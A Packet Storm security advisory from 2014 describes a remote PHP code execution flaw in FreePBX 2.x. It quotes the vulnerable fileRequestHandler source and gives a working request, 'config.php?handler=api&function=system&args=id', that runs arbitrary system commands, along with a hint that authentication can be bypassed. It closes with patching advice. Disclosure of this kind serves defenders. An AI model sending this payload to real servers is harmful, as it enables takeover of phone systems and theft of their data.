what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

FreePBX 2.x Code Execution

FreePBX 2.x Code Execution
Posted Feb 11, 2014
Authored by i-Hmx

FreePBX 2.x suffers from a remote PHP code execution vulnerability due to a poor file validation methodology.

tags | advisory, remote, php, code execution
SHA-256 | 20c5cc704d10be24460de25cdb7eff337ee9976184e28a9640960869ae57d7d7

FreePBX 2.x Code Execution

Change Mirror Download
App : Freepbx 2.x
download : schmoozecom.com
Author : i-Hmx
mail : n0p1337@gmail.com
Home : sec4ever.com , secarrays ltd

Freepbx is famous asterisk based distro used world wide , it suffer from many vulns actually
simple one is included here just as a "knock knock" for the "schmoozecom" team ;)
Here you will see damn obvious PHP code Execution vuln , which can be upgraded to RCE and also dump all box's data
You can have a look if you are interested

File : admin/libraries/view.functions.php

function fileRequestHandler($handler, $module = false, $file = false){
global $amp_conf;

switch ($handler) {
case 'reload':
// AJAX handler for reload event
$response = do_reload();
header("Content-type: application/json");
echo json_encode($response);
break;
case 'file':
/** Handler to pass-through file requests
* Looks for "module" and "file" variables, strips .. and only allows normal filename characters.
* Accepts only files of the type listed in $allowed_exts below, and sends the corresponding mime-type,
* and always interprets files through the PHP interpreter. (Most of?) the freepbx environment is available,
* including $db and $astman, and the user is authenticated.
*/
if (!$module || !$file) {
die_freepbx("unknown");
}
//TODO: this could probably be more efficient
$module = str_replace('..','.', preg_replace('/[^a-zA-Z0-9-\_\.]/','',$module));
$file = str_replace('..','.', preg_replace('/[^a-zA-Z0-9-\_\.]/','',$file));

$allowed_exts = array(
'.js' => 'text/javascript',
'.js.php' => 'text/javascript',
'.css' => 'text/css',
'.css.php' => 'text/css',
'.html.php' => 'text/html',
'.php' => 'text/html',
'.jpg.php' => 'image/jpeg',
'.jpeg.php' => 'image/jpeg',
'.png.php' => 'image/png',
'.gif.php' => 'image/gif',
);
foreach ($allowed_exts as $ext=>$mimetype) {
if (substr($file, -1*strlen($ext)) == $ext) {
$fullpath = 'modules/'.$module.'/'.$file;
if (file_exists($fullpath)) {
// file exists, and is allowed extension

// image, css, js types - set Expires to 24hrs in advance so the client does
// not keep checking for them. Replace from header.php
if (!$amp_conf['DEVEL']) {
header('Expires: '.gmdate('D, d M Y H:i:s', time() + 86400).' GMT', true);
header('Cache-Control: max-age=86400, public, must-revalidate',true);
}
header("Content-type: ".$mimetype);
ob_start();
include($fullpath);
ob_end_flush();
exit();
}
break;
}
}
die_freepbx("../view/not allowed");
break;
case 'api':
if (isset($_REQUEST['function']) && function_exists($_REQUEST['function'])) {
$function = $_REQUEST['function'];
$args = isset($_REQUEST['args'])?$_REQUEST['args']:'';

//currently works for one arg functions, eventually need to clean this up to except more args
$result = $function($args);
$jr = json_encode($result);
} else {
$jr = json_encode(null);
}
header("Content-type: application/json");
echo $jr;
break;
}
exit();
}

Function is called at admin/config.php at line 132

if (!in_array($display, array('noauth', 'badrefer'))
&& isset($_REQUEST['handler'])
) {
$module = isset($_REQUEST['module']) ? $_REQUEST['module'] : '';
$file = isset($_REQUEST['file']) ? $_REQUEST['file'] : '';
fileRequestHandler($_REQUEST['handler'], $module, $file);
exit();
}

Well , it's easy to be exploitd to get any php function executed
eg. system
config.php?handler=api&function=system&args=id
usually it require authentication , but using your mind you can get around it smoothly ;)
that's it

Sollution?
of course i would never leave you @ sec nightmares , just modify your firewall Rules and don't make your box exposed to the nasty internet world :D

can you sleep well now?
of course not , you may be already compromised and also backdoored with super tiny php backdoor , so you'd better to remove all php data,
download latest upgrade from schmoozecom , reboot your box and you are safe . . (Temporary) ;)

Have a good day

./Faris <The Awsome>
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close